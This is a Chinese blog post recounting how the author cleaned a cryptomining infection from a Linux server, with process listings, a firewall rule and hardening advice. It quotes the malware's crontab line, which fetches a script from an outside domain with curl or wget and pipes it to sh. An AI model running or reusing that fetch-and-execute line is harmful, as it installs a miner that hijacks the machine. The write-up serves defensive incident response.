锐客网

  1. 首页 > it技术 > >

挖矿程序复盘

系统安全

背景: 收到朋友的委托,告诉我服务器中毒了,需要我去服务器上清除病毒
景象: 通过账号和密码登录服务器, 发现cpu居高不下,而且定时任务里有计划任务,干掉计划任务,又会立马生成

*/15 * * * * (curl -fsSL lsd.systemten.org||wget -q -O- lsd.systemten.org)|sh

初步分析: 删除了计划任务又自动加上了,肯定是有个后台进程(后面)没有清除,没有干掉导致的,于是我在浏览器里打开 lsd.systemten.org 进行访问,发现是有个shell脚本,具体可以看 cron.sh
初步分析这个shell我们可以得出:
  1. 他在写crontab,tmp目录给了任何用户读写权限
  2. kill 掉了安全工具
  3. 采用了cdn,那么连接ip就是不固定的
  4. 加了秘钥能进行免秘钥访问
---- 登录服务器进行排查:
[root@xxoo]# ps -aux Warning: bad syntax, perhaps a bogus '-'? See /usr/share/doc/procps-3.2.8/FAQ USERPID %CPU %MEMVSZRSS TTYSTAT STARTTIME COMMAND root10.00.0254121648 ?Ss20180:00 /sbin/init root20.00.000 ?S20180:00 [kthreadd] root30.00.000 ?S20180:00 [migration/0] root40.00.000 ?S20180:00 [ksoftirqd/0] root50.00.000 ?S20180:00 [stopper/0] root60.00.000 ?S20180:00 [watchdog/0] root70.00.000 ?S20180:00 [migration/1] root80.00.000 ?S20180:00 [stopper/1] root90.00.000 ?S20180:00 [ksoftirqd/1] root100.00.000 ?S20180:00 [watchdog/1] root110.00.000 ?S20180:00 [events/0] root120.00.000 ?S20180:00 [events/1] root130.00.000 ?S20180:00 [events/0] root140.00.000 ?S20180:00 [events/1] root150.00.000 ?S20180:00 [events_long/0] root160.00.000 ?S20180:00 [events_long/1] root170.00.000 ?S20180:00 [events_power_ef] root180.00.000 ?S20180:00 [events_power_ef] root190.00.000 ?S20180:00 [cgroup] root200.00.000 ?S20180:00 [khelper] root210.00.000 ?S20180:00 [netns] root220.00.000 ?S20180:00 [async/mgr] root230.00.000 ?S20180:00 [pm] root240.00.000 ?S20180:00 [sync_supers] root250.00.000 ?S20180:00 [bdi-default] root260.00.000 ?S20180:00 [kintegrityd/0] root270.00.000 ?S20180:00 [kintegrityd/1] root280.00.000 ?S20180:00 [kblockd/0] root290.00.000 ?S20180:00 [kblockd/1] root300.00.000 ?S20180:00 [kacpid] root310.00.000 ?S20180:00 [kacpi_notify] root320.00.000 ?S20180:00 [kacpi_hotplug] root330.00.000 ?S20180:00 [ata_aux] root340.00.000 ?S20180:00 [ata_sff/0] root350.00.000 ?S20180:00 [ata_sff/1] root360.00.000 ?S20180:00 [ksuspend_usbd] root370.00.000 ?S20180:00 [khubd] root380.00.000 ?S20180:00 [kseriod] root390.00.000 ?S20180:00 [md/0] root400.00.000 ?S20180:00 [md/1] root410.00.000 ?S20180:00 [md_misc/0] root420.00.000 ?S20180:00 [md_misc/1] root430.00.000 ?S20180:00 [linkwatch] root460.00.000 ?S20180:00 [khungtaskd] root470.00.000 ?S20180:00 [kswapd0] root480.00.000 ?SN20180:00 [ksmd] root490.00.000 ?SN20180:00 [khugepaged] root500.00.000 ?S20180:00 [aio/0] root510.00.000 ?S20180:00 [aio/1] root520.00.000 ?S20180:00 [crypto/0] root530.00.000 ?S20180:00 [crypto/1] root600.00.000 ?S20180:00 [kthrotld/0] root610.00.000 ?S20180:00 [kthrotld/1] root630.00.000 ?S20180:00 [kpsmoused] root640.00.000 ?S20180:00 [usbhid_resumer] root650.00.000 ?S20180:00 [deferwq] root970.00.000 ?S20180:00 [kdmremove] root980.00.000 ?S20180:00 [kstriped] root2690.00.000 ?S20180:00 [scsi_eh_0] root2700.00.000 ?S20180:00 [scsi_eh_1] root2860.00.000 ?S20180:00 [virtio-blk] root3400.00.000 ?S20180:00 [jbd2/vda1-8] root3410.00.000 ?S20180:00 [ext4-dio-unwrit] root4250.00.014940968 ?S[virtio-net] root5620.00.000 ?S20180:00 [vballoon] root6590.00.014908968 ?S<20180:00 /sbin/udevd -d root6880.00.000 ?S20180:00 [kjournald] root7210.00.000 ?S20180:00 [kauditd] root9430.00.000 ?S20180:00 [flush-252:0] root9730.00.015300732 ?Ss20180:00 /sbin/dhclient -H ISales-gzcaizhidanao -1 -q -cf /etc/dhcp/dhclient-eth0. root10220.00.035948928 ?S=/var/run/irqbalance.pid root11630.00.0360764472 ?Ssl20180:03 /usr/local/aegis/aegis_update/AliYunDunUpdate root12020.00.1 126608 11492 ?S[cqueue] root12660.00.014936944 ?S<20180:00 /sbin/udevd -d ntp13970.00.0347281848 ?Ss20180:00 ntpd -u ntp:ntp -p /var/run/ntpd.pid -g root15490.00.0850723504 ?Ss20180:00 /usr/libexec/postfix/master postfix15590.00.0853243648 ?S20180:00 qmgr -l -t fifo -u root15860.00.025224576 ?Ss20180:00 /usr/sbin/atd root16060.00.0823442808 ?Ssl20180:00 /usr/sbin/aliyun-service [root@ISales-oo xx]#

通过经验查看各个路径,首先查看/etc/bashrc:
挖矿程序复盘
文章图片

发现有redis,这个可能跟redis 未授权漏洞攻击手法一样
挖矿程序复盘
文章图片

【挖矿程序复盘】通过url搜索发现别人也遇到了 https://www.cnblogs.com/kobexffx/p/11000337.html
执行查杀脚本发现还是会在计划任务生成,所以要断网才能彻底去根除,于是我尝试些hosts 强制解析crontab的域名
发现,他自动给我吧hosts给删除了强制解析,因为是通过wget下载的 所以我直接把wget重命名,然后
yum remove postfix -y 先把crontab 卸载掉,再继续找木马,然后我在防火墙把这个域名解析的ip给禁掉
-A OUTPUT -d 95.215.19.12/32 -j REJECT --reject-with icmp-port-unreachable

然后我从正常的机器把ps命令拷贝过来进行分析(因为病毒把系统命令给劫持了)
挖矿程序复盘
文章图片
挖矿程序复盘
文章图片

挖矿程序复盘
文章图片

所以我把sshd 删掉 然后替换掉正常的,看/etc/passwd 有没有可疑账户 发现也没有
在 /usr/local/sbin 下发现很多隐藏文件,这些就是木马,劫持了系统命令
挖矿程序复盘
文章图片

删掉之后发现cpu降下来了,之前截图的apache等可疑进程干掉然后删除掉文件也正常了
结论:
攻击类型: 可能属于挖矿程序漏洞利用: 可能是reidis 未授权认证漏洞防护建议: (1)Redis,mongodb 启用密码访问 或者监听不要用0.0.0.0,监听使用本机ip (2)应用采用普通用户启动 不采用 root启动 (3)防火墙启动 ,不开放的端口进行关闭 (4)修改密码以及修改ssh端口 (5)部署架构: 数据库只有内网地址,不能上网. 应用和数据库分离开

    推荐阅读


    上一篇:CnnDroid 优化加速原理

    下一篇:nodejs|使用nrm管理npm仓库